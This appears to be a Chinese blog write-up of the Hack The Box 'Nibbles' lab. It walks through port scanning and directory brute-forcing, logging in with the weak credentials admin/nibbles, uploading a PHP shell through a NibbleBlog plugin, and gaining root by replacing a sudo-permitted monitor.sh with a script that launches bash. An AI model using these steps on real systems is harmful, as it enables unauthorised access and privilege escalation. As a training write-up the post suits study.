• 【Hack The Box】linux练习-- Nibbles


    HTB 学习笔记

    Hack The Box】linux练习-- Nibbles


    🔥系列专栏:Hack The Box
    🎉欢迎关注🔎点赞👍收藏⭐️留言📝
    📆首发时间:🌴2022年11月7日🌴
    🍭作者水平很有限,如果发现错误,还望告知,感谢!

    在这里插入图片描述

    信息收集

    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 c4f8ade8f80477decf150d630a187e49 (RSA)
    |   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
    |_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-title: Site doesn't have a title (text/html).
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8

    发现只有一个80。习惯性看一眼源码
    在这里插入图片描述去了页面看了发现可能是个cms
    搜索一下

    在这里插入图片描述
    在这里插入图片描述但是不知道版本信息,接下来需要爆破目录,看能不能找到本本信息

    因为是apache,所以我们应该额外关注php,txt也是需要关注的
    在这里插入图片描述有价值的爆破结果如下

    /content              
    /admin                (Status: 301) [Size: 323] [--> http://10.129.96.84/nibbleblog/admin/]
    /admin.php            (Status: 200) [Size: 1401]
    README
    
    • 1
    • 2
    • 3
    • 4

    在这里插入图片描述
    EXP在下面

    https://packetstormsecurity.com/files/133425/NibbleBlog-4.0.3-Shell-Upload.html
    
    • 1

    在这里插入图片描述
    然后在admin.php发现了登陆页面

    在这里插入图片描述
    最后尝试出来账号密码是弱口令

    admin/nibbles

    在这里插入图片描述然后上传一个php,刚在如果你认真的翻了admin和content两个目录,你就会发现plugins的目录

    http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
    
    • 1

    在这里插入图片描述

    提权

    在这里插入图片描述

    sudo -l
    看到是一个sh文件,碰到这种情况,我们要么在原有文件中修改,增加一个反弹shell,要么直接给源文件全部删除,然后自己写一个bash全覆盖,我们这里采取第二种方法

    我们去到这个目录,发现没有这么个文件,直接自己写一个

    vi monitor.sh
    #!/bin/sh
    bash
    
    chmod +x monitor.sh
    
    sudo ./monitor.sh
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7

    在这里插入图片描述

  • 相关阅读:
    【mido之架子鼓编曲】
    Mybatis对数据加密解密(AES加解密)操作
    行业追踪,2023-09-11
    pytest教程-47-钩子函数-pytest_sessionfinish
    不依赖框架用vue3空白项目从头打造一个过得去的前端
    面经记录—浩x
    测试开发——禅道
    Hadoop-Yarn-ResourceManagerHA
    【华为OD机试真题 JAVA】书籍叠放
    node的http模块
  • 原文地址:https://blog.csdn.net/weixin_65527369/article/details/127756896